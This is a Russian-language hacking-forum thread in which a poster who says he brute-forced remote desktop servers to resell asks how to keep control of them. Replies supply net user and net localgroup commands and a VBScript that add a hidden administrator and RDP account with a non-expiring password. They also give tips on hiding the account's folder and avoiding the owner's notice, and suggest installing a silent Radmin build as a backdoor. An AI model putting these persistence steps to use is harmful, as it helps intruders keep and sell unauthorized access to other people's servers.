набрутил дедиков на продажу немножко,собираюсь брутить еще но вопрос заключается в том,как сменить пароль на учетной записи?как сделать пароль не стандартным?можно ли с дедика создать учетку с правами администратора? пожалуйста помогите с ответами)
Вот так создавай: net user user password /add net localgroup Administrators user /add net localgroup "Remote Desktop Users" user /add net accounts /maxpwage:unlimited Пароль можешь ставить любой
Хэй мэн, если ты сменишь пасс админа на нестандартный, то админу это может не понравиться, из-за чего у тебя под дверью образуется очередь из недовольных клиентов. Твоя задача- толкануть дедик, тебе пофиг, че будет потом. Юзер может хоть выключить этот сервер. А сменив пасс админа, ты тем самым серьезно усилишь риск спалить постороннее присутствие.
Археолог !!! Вариант №1 Создаеш блокнотик и вставляеш туда: Set objNetwork = CreateObject("WScript.Network") strComputer = objNetwork.ComputerName Set colAccounts = GetObject("WinNT://" & strComputer & "") Set objUser = colAccounts.Create("user", "LocalAdmin") objUser.SetPassword "root_qwest" objUser.SetInfo Set objGroup = GetObject("WinNT://" & strComputer & "/Administrators,group") Set objUser = GetObject("WinNT://" & strComputer & "/LocalAdmin,user") objGroup.Add(objUser.ADsPath) Const ADS_UF_DONT_EXPIRE_PASSWD = &h10000 UserFlags = objUser.Get("UserFlags") objPasswordExpirationFlag = UserFlags OR ADS_UF_DONT_EXPIRE_PASSWD objUser.Put "userFlags", objPasswordExpirationFlag objUser.SetInfo Сохраняеш переименовуеш в 111.vbs запускаеш. Получаеш нового пользователя LocalAdmin с правами админа и пасом root_qwest АХТУНГ !!! работает только на windows server если есть группа Administrators Вариант №2 Создаем скрытого пользователя CMD net user user pass /add net localgroup Administrators user /add net localgroup "Remote Desktop Users" user /add net accounts /maxpwage:unlimited Потом скрываешь папку юзера и все. \\ "компьютер"-> "диск С" -> "пользователи" или документы пользователей -> mouse2 на папку юзера -> свойства -> "скрытый" -> OK АХТУНГ !!! работает только на windows server если есть группа Administrators Вариант №3 Подходит для ХP Заливаем на файлообменник сборку Radmin со скрытой установкой (если погуглить можно найти) Качаеш на дедике, запускаеш и вуаля готовый бекдор п.с. http://lmgtfy.com/?q=%D0%BA%D0%B0%D0%BA+%D1%81%D0%BC%D0%B5%D0%BD%D0%B8%D1%82%D1%8C+%D0%BF%D0%B0%D1%80%D0%BE%D0%BB%D1%8C+%D0%BD%D0%B0+%D1%83%D1%87%D0%B5%D1%82%D0%BD%D0%BE%D0%B9+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8 (ссылку несудьба вставить ) п.п.с прочитай и не задавай дурных вопросов https://forum.antichat.ru/thread154221.html
а у меня тоже нубский вопрос,как мне на дед слить брут.я скачал,он у меня в архиве,но как только я распаковываю,то мне выдает ошибку(сматрел на антивирус,но не нашел ваше его)))))
! Невозможно выполнить "C:\DOCUME~1\sys\LOCALS~1\Temp\1\Rar$EX00.703\ipdbrute\IPDbrute_2.0_Pro_old\IPDbrute2.exe" winrar диагностическое сообщение.